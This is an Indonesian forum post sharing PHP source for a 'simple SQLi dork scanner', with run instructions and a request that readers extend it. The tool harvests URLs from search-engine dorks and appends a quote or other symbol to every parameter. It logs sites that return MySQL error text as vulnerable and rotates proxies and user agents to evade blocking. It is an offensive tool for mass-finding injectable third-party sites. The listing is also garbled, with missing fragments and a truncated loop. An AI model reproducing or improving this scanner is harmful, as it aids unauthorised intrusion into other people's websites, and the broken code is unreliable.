Simple Sqli Dork Scanner

ijin share dork scan punya ane
mohon dikembangkan lagi gan

proxy==true){
   curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, false);
   curl_setopt($ch, CURLOPT_PROXY, $this->proxy());
  }
        curl_setopt($ch, CURLOPT_USERAGENT, array_rand($this->useragent));
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_AUTOREFERER, true );
        curl_setopt($ch, CURLOPT_TIMEOUT, 15);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 15);
        $exec = curl_exec($ch);
        curl_close($ch);
        return $exec;
    }
 /**
  * Return one randomly chosen line from the proxy list file.
  *
  * Reads $this->proxy_file, picks a random line and strips CR/LF from it.
  *
  * NOTE(review): when the file does not exist, the return value is a
  * human-readable message ("file ... does not exist, please create it
  * first"), not a proxy address. The cURL setup earlier in this listing
  * passes whatever this method returns straight to CURLOPT_PROXY.
  *
  * @return string A line from the proxy file, or the message above.
  */
 function proxy(){
  // Guard clause: no list file, so hand back the (Indonesian) notice text.
  if(!@is_file($this->proxy_file)){
   return "tidak ada file {$this->proxy_file}, tolong buat dulu";
  }
  $lines = file($this->proxy_file);
  // file() keeps the line terminators, so they are removed from the pick.
  $picked = $lines[array_rand($lines)];
  return str_replace(array("\n", "\r", "\r\n"), "", $picked);
 }
    /**
     * Rebuild $url with $this->key appended to the value of every
     * query-string parameter.
     *
     * A URL without a query string is returned unchanged. Otherwise the
     * result is assembled from scheme, host and path only, followed by the
     * rewritten query; no other URL component is carried over.
     *
     * Reviewer note (defensive view): every parameter of the rebuilt URL
     * ends with the same marker, and the caller in this listing decides the
     * outcome purely by searching the response body for database/PHP error
     * text. An application that uses parameterised queries and does not
     * show raw error messages to visitors gives this check nothing to match.
     *
     * @param string $url URL to rewrite.
     * @return string The rewritten URL, or $url itself when it has no query.
     */
    function parse($url){
        // Remove line-break characters from the marker and store the cleaned
        // value back on the object (side effect on $this->key).
        $this->key = str_replace(array("\n", "\r", "\r\n"), "", $this->key);
        $arr = parse_url($url);
        // No query string (or an empty one): nothing to rewrite.
        if(empty($arr['query'])){
            return $url;
        }    
        // parse_str() URL-decodes names and values, and PHP turns dots and
        // spaces in parameter names into underscores, so the rebuilt names
        // can differ from the ones in the original URL.
        parse_str($arr['query'], $ar);
        $key = array_keys($ar);
        foreach($key as $a){
            // Plain concatenation: the value is not URL-encoded again.
            // NOTE(review): $x is never initialised before this loop.
            $x[] = $a."=".$ar[$a].$this->key;
            }
        $imp = implode("&", $x);
        // Reads 'scheme', 'host' and 'path' without checking they exist;
        // port, credentials and fragment from the input are not included.
        return $arr['scheme']."://".$arr['host'].$arr['path']."?".$imp;
    }
    /**
     * Append one URL to the results file named by $this->simpan
     * ("simpan" = save).
     *
     * The file is opened in append mode on each call, so existing entries
     * are kept and every URL is written on its own line. Nothing is
     * returned, and the fopen() result is not checked before it is used.
     *
     * @param string $url URL to record; written as-is, followed by "\n".
     */
    function simpan($url){
        $handle = fopen($this->simpan, "a");
        $line = $url."\n";
        fwrite($handle, $line);
        fclose($handle);
    }
 /**
  * Post-process one page of result URLs ("cek urls" = check URLs).
  *
  * When $this->hapus_yg_sama is false the input is returned untouched.
  * When it is true (the option is described in this listing as removing
  * identical URLs within each page), URLs are rebuilt from separate
  * scheme / host / path / query pieces and returned as a new list.
  *
  * NOTE(review): part of this method is missing in this copy. The loop
  * header below is truncated, so where $key, $url, $prm, $scheme, $path
  * and $host come from cannot be seen; the comments describe only the
  * lines that survived.
  *
  * @param array $urls URLs collected from one results page (assumed to be an array, confirm against the caller).
  * @return array|null The rebuilt list, or $urls unchanged when de-duplication is off.
  */
 function cekurls($urls){
  $urlv = null;
  // De-duplication switched off: pass the list through as-is.
  if($this->hapus_yg_sama==false) return $urls;
  elseif($this->hapus_yg_sama==true){
   // NOTE(review): truncated line, the text between "$a" and "$url){" is lost.
   for($a=0; $a$url){
    // Prefix the stored query part with "?" when there is one.
    // Note that this assigns to $prm itself, the same variable that is
    // indexed as an array in the condition above.
    if(!empty($prm[$key])){
     $prm = "?".$prm[$key];
    }elseif(empty($prm[$key])) $prm = null;
    // Reassemble scheme://host + path + optional query.
    $urlv[] = $scheme[$key]."://".$url.$path[$key].$prm;
   }
   return $urlv;
   // The block closed here has no visible opening line (lost with the
   // truncated text above). These branches run when $host is not set and
   // only print a status tag; the second one reads "[Proxy may be invalid]".
   }elseif(!isset($host) && $this->proxy==false) echo "[Error] ";
   elseif(!isset($host) && $this->proxy==true) echo "[Proxy mungkin tidak valid] ";
  }
 }
    function scandork(){
        $dork = $this->dork;
        $dork = str_replace(array("\n", "\r", "\r\n"), "", $dork);
        $start=0;
        $jumlah=0;
        $page=0;
  $total=0;
        while($jumlah<=$this->jumlah){
            $a=0;
            $graph = $this->graph($dork, $start, null);
            $match = $this->match('

parse(urldecode($url)); $graph = $this->graph(null, null, $urlp); if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph)){ echo "vuln -> ".urldecode($urlp)."\n"; $this->simpan($urlp); $a++; }else{ echo "NOT vuln - > ".urldecode($urlp)."\n"; } $jumlah++; } $selang = time() - $mulai; $detik = round($selang); $menit = round($selang / 60); $jam = round($selang / 3600); $start=$start+count($cekurls); $page++; echo "Selesai scan page {$page} dalam : {$jam} jam {$menit} menit {$detik} detik\n\n"; } echo "Jumlah situs yang discan {$jumlah}\n"; } } echo "simple dork scanner by rieqyns13\n\n"; $dc = new rieqyns13; echo "Masukkan dork = "; $fp = fopen("php://stdin", "rb"); //dorknya $str = fgets($fp); echo "Masukkan simbol/key = "; //simbol yg disisipkan pada url $key = fgets($fp); fclose($fp); ///OPTION/////////////////////////////////// $dc->hapus_yg_sama = true; //isi true jika ingin menghapus url yg sama dalam setiap page, false jika tidak $dc->proxy = true; //true jika ingin menggunakan proxy yg ada di $dc->proxy_file, atau false jika tidak ingin menggunakan proxy $dc->proxy_file = "proxylist.txt"; //digunakan jika $dc->proxy=true, setiap proxy yg ada di dalam file harus menggunakan susunan -> proxy:port . contoh "914.143.141.131:8080" $dc->jumlah = 300; //jumlah situs yg discan //////////////////////////////////////////// $dc->dork = $str; $dc->key = $key; $dc->simpan = "url_vuln.txt"; $dc->scandork(); ?>

copas ke notepad trus simpan dgn extensi php, trus buka cmd, masuk ke path dmana taruh file php tadi, trus jalanin pke printah php scan.php, dgn syarat path nya harus udah ditambahin/diatur ke c:\xampp\php


dan ini gambar jika menggunakan proxy
tuh berarti proxy yg dipke harus bener2 FRESH dan tahan lama, jika tidak, maka beberapa url atau bahkan semua url tidak bisa digraph.
skarang penjelasan selanjutnya.
tuh konsep dari dork scanner ane,  jika url ada parameter tertentu kya gini misal:
http://site.com/detail.php?id=2&next.asp?cat=21&gay.cfm?id=null
ntar dirubah ke
http://site.com/detail.php?id=2'&next_asp?cat=21'&gay_cfm?id=null'

sesuai dengan simbol yg dimasukkan.
jika url tidak ada parameter kya di atas, akan direturn ke url aslinya
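ane cuman bisa nangkep site vuln berdasarkan pesan sql error pada umumnya gan, jadi site yg keluar gak terlalu banyak. catatan: pola kya "Syntax error" ato "Fatal error" juga cocok sama error PHP biasa yg gak ada hubungannya ama SQL, jadi tulisan "vuln" di sini cuma indikasi, bukan bukti. kalo pesan error gak ditampilin ke pengunjung dan query-nya pake prepared statement, pengecekan model gini gak nemu apa-apa. ni gan buat ngecek apakah tuh site vuln ato kagak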
if(preg_match("/error in your SQL syntax|mysql_fetch_array\(\)|execute query|mysql_fetch_object\(\)|mysql_num_rows\(\)|mysql_fetch_assoc\(\)|mysql_fetch\?\?_row\(\)|SELECT \* FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $graph))
pengalaman ane klo keseringan pke dork yg kompleks, biasanya diblock ama captcha gan
mohon dikembangin lagi biar bisa menjadi tool yg advanced gan